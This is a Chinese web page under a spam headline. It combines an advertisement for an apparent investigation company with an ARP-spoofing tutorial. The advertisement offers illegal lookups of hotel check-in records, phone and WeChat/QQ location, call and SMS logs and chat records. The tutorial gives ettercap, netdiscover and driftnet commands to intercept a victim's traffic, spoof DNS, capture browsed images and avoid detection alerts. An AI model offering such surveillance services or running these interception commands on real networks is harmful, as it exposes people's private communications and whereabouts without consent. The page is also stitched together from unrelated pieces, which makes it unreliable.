网上怎么找黑客查开房记录(黑客能查到什么)

80酷酷网    80kuku.com

网上怎么找黑客查开房记录(黑客能查到什么)本公司是最著名专业调查公司,是北京地区为数不多的专业合法注册调查公司,为您提供可靠的北京定位手机号码找人、开房记录查询、QQ微信定位找人、手机通话短信记录查询、QQ微信聊天记录查询等业务!公司拥有先进的高科技设备,和庞大的调查公司调查网络,为您提供各种有力有利证据,足以成功的完成各种调查取证工作。公司秉承“待人以诚,持事以信”经营理念,以客户满意为标准,以客户需求为准绳,遵循“服务至上,客户第一”的原则,尽心尽职、尽善尽美地履行客户的委托合约!

前言:

  由于在局域网中,网关会不断地发送 ARP 数据包询问当前是否有新的客户端上线,如果我们可以欺骗当前局域网网段下的主机,

  把我们当成网关地址,并且我们把欺骗的流量转发到真正的网关地址,这样我们就可以嗅探到别人的信息

实验环境:

  1、虚拟机 A(kali)

  2、实验主机 B(win 10)

  3、保证虚拟机和主机在同一网段,方法在上一篇有写

实验步骤:

  1、kali 里使用 netdiscover -i eth0 [-r range...] 来获取目标主机的 IP 地址,这里直接使用主机 B 的 IP 和网关

  2、kali 终端使用 ettercap -i eth0 -Tq -M arp:remote /// /// 来进行流量欺骗,前一个 /// 为 B 的 IP,后者为网关

隐私窥探,黑客是如何知道你的秘密的?

隐私窥探,黑客是如何知道你的秘密的?

注:/// 的完整写法为 MAC/IPs/IPv6/PORTs,默认为全部,MAC 为物理地址,IPs 为 IPv4,PORTs 为端口号

  若 ettercap 操作失败,需要我们对其进行提权

  修改 /etc/ettercap/etter.conf 文件,将 ec_uid 和 ec_gid 的值改为 0,可以使用 leafpad、vim 等进行操作

隐私窥探,黑客是如何知道你的秘密的?

  3、打开一个新的终端,通过 driftnet -i eth0 -a -d dir 来把 B(目标主机)浏览的图片保存在目录 dir 里,也可以通过 -b 弹窗直接查看浏览的图片

隐私窥探,黑客是如何知道你的秘密的?

  4、打开主机 B 的浏览器查看图片(需要 http 的)

隐私窥探,黑客是如何知道你的秘密的?

  5、在 kali 里打开相应文件夹,查看里面的内容

隐私窥探,黑客是如何知道你的秘密的?

扩展:

1、netdiscover:

    a、基于 ARP 协议

    b、主动或被动地发现WIFI或交换网络的主机

    c、常用参数选项:

-i :接口。选择你监控的接口,比如eth0

-r :range 比如192.168.0.0/24(/24 表示网络号为 24 位)

-l :从文件读取range列表

-p :被动模式

-t :每个ARP请求之间等待时长,单位为毫秒。这个可以用来规避检测系统的告警

-c :对每个IP发多少个探针

-P :输出形式更适合重定向到一个文件中。

注:具体可以使用 man netdiscover 或 netdiscover -h 来查询详细操作

  ARP 协议是将 IP 地址转换为 MAC 地址(物理地址)地网络协议

  局域网中主机的通讯是通过 MAC 地址来实现的,区分 IPv4 里的网络号和主机号

2、ettercap [OPTIONS] [TARGET1] [TARGET2]:

    a、两种运行方式:UNIFIED 方式是以中间人方式嗅探;BRIDGED 方式是在双网卡情况下,嗅探两块网卡之间的数据包

    b、常用参数:

-i :指定接口

-T :文本模式,常配合 -q 安静模式使用,-s 表示加载脚本

-M :指定中间人模式

·ARP 欺骗:arp:remote(双向)、arp:oneway(单向,欺骗目标一到目标二的通讯)

·ICMP 欺骗:icmp:(MAC/IP)

        ·DHCP 欺骗:dhcp:(ip_pool/netmask/dns)

如:-M dhcp:
/255.255.255.0/192.168.0.1 不提供 IP 地址,只欺骗目标子网掩码和 DNS 服务器

    c、常见参数组合:

ARP 毒化 eth0 所在的网段,安静模式文本显示:ettercap -Tqi eth0 -M ARP /// ///

      对 192.168.1.120 进行 DNS 欺骗,使用默认网卡 eth0,文本模式安静显示:ettercap -Tq -P dns_spoof -M arp:remote /192.168.1.120// ///

3、driftnet [options] [filter code]:

    a、driftnet 是一款使用简单的图片捕获工具,可以很方便的在网络数据包中抓取图片

    b、参数命令:

-b :捕获到新的图片时发出嘟嘟声

-i :选择监听接口

-f:读取一个指定 pcap 数据包中的图片

-p :不让所监听的接口使用混杂模式

-a :后台模式,将捕获的图片保存到目录中(不会显示在屏幕上)

-m :指定保存图片数的数目

-d :指定保存图片的路径(目录)

-x:指定保存图片的前缀名

分享到
  • 微信分享
  • 新浪微博
  • QQ好友
  • QQ空间
点击: